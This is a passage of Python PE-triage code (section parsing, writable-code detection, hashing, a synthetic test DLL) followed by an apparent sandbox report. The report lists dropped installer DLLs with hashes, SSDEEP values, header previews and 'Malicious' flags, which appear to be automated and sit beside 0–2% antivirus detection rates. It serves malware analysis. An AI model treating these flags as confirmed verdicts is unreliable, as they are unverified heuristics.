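        for label, algo in (("MD5", "md5"), ("SHA1", "sha1"),
                            ("SHA-256", "sha256"), ("SHA-512", "sha512"))
    }


def pe_sections(data: bytes) -> list:
    """Parse the COFF section table of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        (name, vsize, vaddr, rawsize, rawptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", data, table + i * 40)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr, "vsize": vsize,
            "rawptr": rawptr, "rawsize": rawsize,
            "characteristics": chars,
        })
    return sections


def writable_code_sections(sections: list) -> list:
    """Names of sections that are code/executable and also writable."""
    code = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
    return [s["name"] for s in sections
            if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & code]


def triage(data: bytes) -> dict:
    """Assemble the fields the report shows for each dropped file."""
    sections = pe_sections(data)
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy(data),
        **file_hashes(data),
        "sections": [s["name"] for s in sections],
        "writable code sections": writable_code_sections(sections),
    }


def build_test_pe(text_characteristics: int) -> bytes:
    """Constructed minimal PE32 DLL image for demonstration (not a file from
    the report): a .text section with the given flags plus a .data section."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)  # i386, 2 sections, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic

    def section(name, vaddr, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x200, vaddr, 0x200, rawptr, 0, 0, 0, 0, chars)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + section(b".text", 0x1000, 0x400, text_characteristics)
               + section(b".data", 0x2000, 0x600, 0xC0000040)).ljust(0x400, b"\0")
    text = bytes(range(256)) * 2   # uniform byte distribution: entropy exactly 8.0
    data_sect = b"\0" * 0x200      # constant bytes: entropy 0.0
    return headers + text + data_sect


if __name__ == "__main__":
    for flags in (0x60000020, 0xE0000020):   # read/execute code vs. writable code
        print(hex(flags), triage(build_test_pe(flags)))
```

Run it against a dropped file with `triage(open(path, "rb").read())`; the MD5/SHA1/SHA-256/SHA-512 values should match the record above byte for byte, and a non-empty "writable code sections" list is the condition behind the report's writable-.text signature. The report's "Encrypted" and "Malicious" columns come from Joe Sandbox's own heuristics and are not reproduced here.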
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):397808
                                                                                                    Entropy (8bit):6.396146399966879
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                                                                    MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                                                                    SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                                                                    SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                                                                    SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):181527
                                                                                                    Entropy (8bit):6.362061002967905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
                                                                                                    MD5:0D0D311D1837705B1EAFBC5A85A695BD
                                                                                                    SHA1:AA7FA3EB181CC5E5B0AA240892156A1646B45184
                                                                                                    SHA-256:AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
                                                                                                    SHA-512:14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1374336
                                                                                                    Entropy (8bit):6.544219940913283
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:XxPyiEuJLPKpBW3n41iniSpKMFH/ZNYTujQb/XseSGwUCowrnDKHYHdT8s5ly8:B5XlHdxV
                                                                                                    MD5:86CE128833ECB1AC52EBED17993C1B56
                                                                                                    SHA1:C7FC8F88E908591CAAA9F25B954B06E814576158
                                                                                                    SHA-256:B22B57B0B6E0FD531CEA32CED338B9D12DD018D09D0B95CD61F166F64253B355
                                                                                                    SHA-512:1B8BEE2668599E33EA6F8121F7584431211512D6BCC8B409EAE162FBD6B505B0F4D0CD984AC8439C515BE4058A20270954D5DCBC62D16E95ED31A8225500F839
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):448557
                                                                                                    Entropy (8bit):6.353356595345232
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                                                    MD5:908111F583B7019D2ED3492435E5092D
                                                                                                    SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                                                    SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                                                    SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):259014
                                                                                                    Entropy (8bit):6.075222655669795
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                                                                    MD5:B4FDE05A19346072C713BE2926AF8961
                                                                                                    SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                                                                    SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                                                                    SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):101544
                                                                                                    Entropy (8bit):6.237382830377451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                                                                    MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                                                    SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                                                    SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                                                    SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):693931
                                                                                                    Entropy (8bit):6.506667977069754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:pgl0XdgCyZfZ1hTDy4ArwyP5Lt6fEWmOxU:u0NnYZ1hTDy44PTZOG
                                                                                                    MD5:37CE2C67DDCEE507833B9AE784AE515D
                                                                                                    SHA1:711B2AAE989D439CC816D198A3A4A7CDD6A070A3
                                                                                                    SHA-256:7A2BD595F34A25C13E94E4C2CDFB1758E9DE60FA7D497F5755BBBF906E82A0D7
                                                                                                    SHA-512:B8FB5A3D2CA99A661FB35F1C560A283070D28A1E438BF124632D4AD8D2EBE0869DF73F1AB8149DEA1FCA66B0285D28028DF83EF36AB27431ED26176EC2A21FCE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1055417
                                                                                                    Entropy (8bit):7.312780382733874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:1MWKOBAUZLYRwPKDOlbbT0pGavkg3NyeuQ6l9fHOfc4Z:1dBAUZLYWiDOSpGaXBuQQ9u3Z
                                                                                                    MD5:F721A6B0A1590D55EADEAE81B8F629AA
                                                                                                    SHA1:8C6ED37D1D926D949161FF5F3B5682A4068644CE
                                                                                                    SHA-256:8E2EB9BAC3F5C37D91BFF7F04420DDA55CD369178C73ADF11E6C4DD7E597260F
                                                                                                    SHA-512:2FFDB23615EE72DF600248D6B9DED0E25DAE12D8424557EC07589F34601C00421CF32A748CB564AFCED99B419805E43BF4D6D05EC33D581DBD03F9AF853005E8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165739
                                                                                                    Entropy (8bit):6.062324507479428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                                                                    MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                                                                    SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                                                                    SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                                                                    SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):248781
                                                                                                    Entropy (8bit):6.474165596279956
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                                                    MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                                                    SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                                                    SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                                                    SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):706136
Entropy (8bit):6.517672165992715
Encrypted:false
SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
MD5:3A8A13F0215CDA541EC58F7C80ED4782
SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):1222671
Entropy (8bit):6.4094687832944235
Encrypted:false
SSDEEP:24576:s2AYizbUVBV0u6ydQXUPIUJL0VGQRhORRajBbGN2JtYI3+0EIZy3fh6UtvR6YO3c:1AYhVBBsUJLORhH0QtYI33EuS1tvzO3c
MD5:C12734BD4C4C33E788FE7FC6C1E47522
SHA1:F474AB91C5DECD6D533C1DA016DC65800DBC5E9D
SHA-256:9FFCD35CAEC4B199481620C82B8E2AFA9AE26F557D9A99C18B7DC23E61D59131
SHA-512:AE948D3AB723144D2546F8B3401805CCFFBB312A14AD8D314685FB1EA85E74955F1372FEFE177571F518F51E66783B9813F876B93B35ED6E27C0E4743D59FA80
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:data
Category:dropped
Size (bytes):2586624
Entropy (8bit):6.983193418282665
Encrypted:false
SSDEEP:49152:W7mmNpaKaPVVldZRknn2/vg3FYPpWfidqm6tWz28g:W7mpKgNdZRknYg3Fo8OqmUWz28g
MD5:E6D179D3614AC88CFC80972DE4EBE2DC
SHA1:8E05D76342CB0328921896C5901EBA9A2119ECFF
SHA-256:2A92455631685D2F08DCFB4460A9A6B7452AB5911FE97992674D2980833D63E4
SHA-512:E95BA2450924EEE8334FBB245C0DBB5F9C5BF117D0638A069EBB4A7E5AEE6E4448B45BB948B2074B23B8A95F4B71ED83C17BBFEC28EC8221FEDED3955F1B5DEB
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):693931
Entropy (8bit):6.506667977069754
Encrypted:false
SSDEEP:12288:pgl0XdgCyZfZ1hTDy4ArwyP5Lt6fEWmOxU:u0NnYZ1hTDy44PTZOG
MD5:37CE2C67DDCEE507833B9AE784AE515D
SHA1:711B2AAE989D439CC816D198A3A4A7CDD6A070A3
SHA-256:7A2BD595F34A25C13E94E4C2CDFB1758E9DE60FA7D497F5755BBBF906E82A0D7
SHA-512:B8FB5A3D2CA99A661FB35F1C560A283070D28A1E438BF124632D4AD8D2EBE0869DF73F1AB8149DEA1FCA66B0285D28028DF83EF36AB27431ED26176EC2A21FCE
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):121524
Entropy (8bit):6.347995296737745
Encrypted:false
SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
MD5:6CE25FB0302F133CC244889C360A6541
SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):814068
Entropy (8bit):6.5113626552096
Encrypted:false
SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
MD5:5B1EB4B36F189362DEF93BF3E37354CC
SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):181527
Entropy (8bit):6.362061002967905
Encrypted:false
SSDEEP:3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
MD5:0D0D311D1837705B1EAFBC5A85A695BD
SHA1:AA7FA3EB181CC5E5B0AA240892156A1646B45184
SHA-256:AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
SHA-512:14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):268404
Entropy (8bit):6.265024248848175
Encrypted:false
SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
MD5:C4C23388109D8A9CC2B87D984A1F09B8
SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):1606715
Entropy (8bit):6.432733703292802
Encrypted:false
SSDEEP:24576:qi0l5PSkLHq6M30RmWXD4cE/TpXy4CEJQwAj7/RyYijPIDEFIgX3zdHyqFMa:eSqVMkRm3dyEYiGEFTdfFN
MD5:34007E6F8E18D371DBFF19A279B008C3
SHA1:58B091382EB981587CA6FDFAFC314E458598B8BB
SHA-256:44D65416BB7EC0F43CE91927B33002CDF3E56038562F83E602C19A20C48AEB7D
SHA-512:37F6338CDEA6220CF9079F25F760A2C7A50A01BD6A98C01798D20203F5A56FA0F37CDD7E91AE246C1077A34EC4FA42E9D2305ADA7CA8945E6591C8E26164C906
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):1374336
Entropy (8bit):6.544219940913283
Encrypted:false
SSDEEP:24576:XxPyiEuJLPKpBW3n41iniSpKMFH/ZNYTujQb/XseSGwUCowrnDKHYHdT8s5ly8:B5XlHdxV
MD5:86CE128833ECB1AC52EBED17993C1B56
SHA1:C7FC8F88E908591CAAA9F25B954B06E814576158
SHA-256:B22B57B0B6E0FD531CEA32CED338B9D12DD018D09D0B95CD61F166F64253B355
SHA-512:1B8BEE2668599E33EA6F8121F7584431211512D6BCC8B409EAE162FBD6B505B0F4D0CD984AC8439C515BE4058A20270954D5DCBC62D16E95ED31A8225500F839
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):1222671
Entropy (8bit):6.4094687832944235
Encrypted:false
SSDEEP:24576:s2AYizbUVBV0u6ydQXUPIUJL0VGQRhORRajBbGN2JtYI3+0EIZy3fh6UtvR6YO3c:1AYhVBBsUJLORhH0QtYI33EuS1tvzO3c
MD5:C12734BD4C4C33E788FE7FC6C1E47522
SHA1:F474AB91C5DECD6D533C1DA016DC65800DBC5E9D
SHA-256:9FFCD35CAEC4B199481620C82B8E2AFA9AE26F557D9A99C18B7DC23E61D59131
SHA-512:AE948D3AB723144D2546F8B3401805CCFFBB312A14AD8D314685FB1EA85E74955F1372FEFE177571F518F51E66783B9813F876B93B35ED6E27C0E4743D59FA80
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........z..(......#.........v....................|h.................................*........ ......................`.......0.......p...........................k...........................`......................d5..`............................text...X...........................`.P`.data...|...........................@.`..rdata...N.......P..................@.`@/4......l....0......................@.0@.bss.... ....@........................`..edata.......`......................@.0@.idata.......0... ..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc........p......................@.0..reloc...k.......l..................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):463112
                                                                                                    Entropy (8bit):6.363613724826455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
                                                                                                    MD5:D9D9C79E35945FCA3F9D9A49378226E7
                                                                                                    SHA1:4544A47D5B9765E5717273AAFF62724DF643F8F6
                                                                                                    SHA-256:18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
                                                                                                    SHA-512:B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26562
                                                                                                    Entropy (8bit):5.606958768500933
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                                                    MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                                                    SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                                                    SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                                                    SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):337171
                                                                                                    Entropy (8bit):6.46334441651647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
                                                                                                    MD5:51D62C9C7D56F2EF2F0F628B8FC249AD
                                                                                                    SHA1:33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
                                                                                                    SHA-256:FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
                                                                                                    SHA-512:03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174543
                                                                                                    Entropy (8bit):6.3532700320638025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
                                                                                                    MD5:65D8CB2733295758E5328E5A3E1AFF15
                                                                                                    SHA1:F2378928BB9CCFBA566EC574E501F6A82A833143
